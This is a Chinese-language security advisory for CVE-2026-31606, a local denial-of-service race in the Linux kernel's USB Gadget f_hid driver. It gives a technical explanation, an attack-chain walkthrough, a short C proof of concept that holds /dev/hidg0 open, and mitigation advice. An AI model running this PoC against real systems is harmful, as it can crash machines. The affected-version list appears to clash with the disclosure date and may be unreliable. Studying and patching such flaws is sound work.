IPBUF安全漏洞报告
English
CVE-2026-31606 CVSS 5.5 中危

CVE-2026-31606 Linux内核USB Gadget DoS漏洞

披露日期: 2026-04-24
来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号
CVE-2026-31606
漏洞类型
拒绝服务
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Linux Kernel

相关标签

Linux KernelUSB GadgetDoSRace ConditionLocalMemory Corruption

漏洞概述

Linux内核USB Gadget f_hid驱动存在安全漏洞。在设备文件/dev/hidg*仍被打开的情况下,若执行unbind与bind操作,会错误地重新初始化正在使用的cdev结构体,导致内核崩溃及系统拒绝服务。

技术细节

该漏洞位于Linux内核的`drivers/usb/gadget/function/f_hid.c`驱动中。原代码使用静态分配的cdev结构体,当unbind后立即bind时,`cdev_init`会被再次调用。此时如果用户空间进程仍持有对`/dev/hidg*`的文件描述符,旧的cdev引用计数未归零,导致结构体被不安全地重用,破坏内核内存管理结构。修复方案采用`cdev_alloc`在堆上动态分配cdev,确保每次bind操作使用全新的内存区域,从而避免竞态条件和内存破坏引发的内核Oops。

攻击链分析

STEP 1
步骤1:本地访问
本地低权限用户打开USB Gadget HID设备文件(如/dev/hidg0),获取文件描述符并保持打开状态。
STEP 2
步骤2:触发重配置
管理员或系统服务执行USB Gadget配置的unbind操作,随后立即执行bind操作。
STEP 3
步骤3:竞态触发
在bind过程中,驱动程序调用cdev_init初始化仍被步骤1中引用的cdev结构体,导致内核数据结构损坏。
STEP 4
步骤4:系统崩溃
内核检测到非法内存访问或状态不一致,触发Oops,导致系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// PoC for CVE-2026-31606 // Compile: gcc poc.c -o poc // This PoC keeps /dev/hidg0 open to trigger the race condition // when an administrator performs unbind/bind operations. #include <fcntl.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> int main() { const char *device = "/dev/hidg0"; int fd = open(device, O_RDWR); if (fd < 0) { perror("[-] Failed to open device"); return 1; } printf("[+] Device %s opened successfully (fd=%d).\n", device, fd); printf("[+] Holding file descriptor open...\n"); printf("[!] Now trigger unbind/bind (e.g., via configfs or USB gadget reload).\n"); printf("[!] Kernel crash/Oops may occur due to cdev re-initialization.\n"); // Keep the device open indefinitely while (1) { sleep(1); } close(fd); return 0; }

影响范围

Linux Kernel < 5.10.214
Linux Kernel < 5.15.153
Linux Kernel < 6.1.83
Linux Kernel < 6.6.23
Linux Kernel < 6.8.2

防御指南

临时缓解措施
限制非特权用户对/dev/hidg*设备文件的访问权限;避免在设备可能被占用时进行USB Gadget驱动的重新加载或配置切换。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表